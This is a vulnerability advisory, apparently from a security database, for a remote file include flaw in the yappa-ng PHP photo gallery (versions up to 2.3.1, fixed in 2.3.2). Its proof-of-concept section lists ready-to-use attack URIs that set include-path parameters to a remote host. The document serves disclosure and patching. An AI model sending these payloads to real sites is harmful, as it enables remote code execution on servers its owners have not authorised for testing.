Yappa-NG Unspecified Remote File Include Vulnerability
BID:13371
Info
Yappa-NG Unspecified Remote File Include Vulnerability
| Bugtraq ID: | 13371 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 24 2005 12:00AM |
| Updated: | Apr 24 2005 12:00AM |
| Credit: | Discovery is credited to James Bercegay of the GulfTech Security Research Team. |
| Vulnerable: |
yappa-ng yappa-ng 2.3.1 yappa-ng yappa-ng 2.3 .0 yappa-ng yappa-ng 2.2.2 yappa-ng yappa-ng 2.2.1 yappa-ng yappa-ng 2.2 .0 yappa-ng yappa-ng 2.1 .0 yappa-ng yappa-ng 2.0.1 yappa-ng yappa-ng 2.0 .0 yappa-ng yappa-ng 1.6 yappa-ng yappa-ng 1.5 yappa-ng yappa-ng 1.4 yappa-ng yappa-ng 1.3 yappa-ng yappa-ng 1.2 yappa-ng yappa-ng 1.1 yappa-ng yappa-ng 1.0 yappa-ng yappa-ng 0.9 |
| Not Vulnerable: |
yappa-ng yappa-ng 2.3.2 |
Discussion
Yappa-NG Unspecified Remote File Include Vulnerability
yappa-ng is prone to a remote file include vulnerability. This issue may let remote attackers include and execute malicious remote PHP scripts.
The vendor has not published any specific details about this vulnerability other than stating that it is addressed in the 2.3.2 security release of the software.
yappa-ng is prone to a remote file include vulnerability. This issue may let remote attackers include and execute malicious remote PHP scripts.
The vendor has not published any specific details about this vulnerability other than stating that it is addressed in the 2.3.2 security release of the software.
Exploit / POC
Yappa-NG Unspecified Remote File Include Vulnerability
There is no exploit required.
The following proof of concept URI are available:
http://www.example.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_overview.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_leftnavbar.inc.php?config[path_src_include]=http://www.example.com/&config[show_album_desc_prev]=yes
http://www.example.com/src/index_image.inc.php?config[path_src_include]=http://www.example.com/&config[show_comments]=1&config_album[show_comments]=1
http://www.example.com/src/image-gd.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/image.class.php?config[path_src_include]=http://www.example.com/&config[image_module]=blah
http://www.example.com/src/album.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/show_random.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/main.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.example.com/
There is no exploit required.
The following proof of concept URI are available:
http://www.example.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_overview.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_leftnavbar.inc.php?config[path_src_include]=http://www.example.com/&config[show_album_desc_prev]=yes
http://www.example.com/src/index_image.inc.php?config[path_src_include]=http://www.example.com/&config[show_comments]=1&config_album[show_comments]=1
http://www.example.com/src/image-gd.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/image.class.php?config[path_src_include]=http://www.example.com/&config[image_module]=blah
http://www.example.com/src/album.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/show_random.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/main.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.example.com/
Solution / Fix
Yappa-NG Unspecified Remote File Include Vulnerability
Solution:
This issue has been addressed in the 2.3.2 security release of the software.
yappa-ng yappa-ng 0.9
yappa-ng yappa-ng 1.0
yappa-ng yappa-ng 1.1
yappa-ng yappa-ng 1.2
yappa-ng yappa-ng 1.3
yappa-ng yappa-ng 1.4
yappa-ng yappa-ng 1.5
yappa-ng yappa-ng 1.6
yappa-ng yappa-ng 2.0 .0
yappa-ng yappa-ng 2.0.1
yappa-ng yappa-ng 2.1 .0
yappa-ng yappa-ng 2.2 .0
yappa-ng yappa-ng 2.2.1
yappa-ng yappa-ng 2.2.2
yappa-ng yappa-ng 2.3 .0
yappa-ng yappa-ng 2.3.1
Solution:
This issue has been addressed in the 2.3.2 security release of the software.
yappa-ng yappa-ng 0.9
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 1.0
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 1.1
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 1.2
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 1.3
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 1.4
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 1.5
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 1.6
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 2.0 .0
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 2.0.1
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 2.1 .0
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 2.2 .0
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 2.2.1
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 2.2.2
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 2.3 .0
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
yappa-ng yappa-ng 2.3.1
-
yappa-ng yappa-ng 2.3.2
http://sourceforge.net/project/showfiles.php?group_id=70802
References
Yappa-NG Unspecified Remote File Include Vulnerability
References:
References:
- 2.3.2 Security Release (yappa-ng)
- Vendor Homepage (In-Portal)
- Yappa-NG Multiple Vulnerabilities (GulfTech Security Research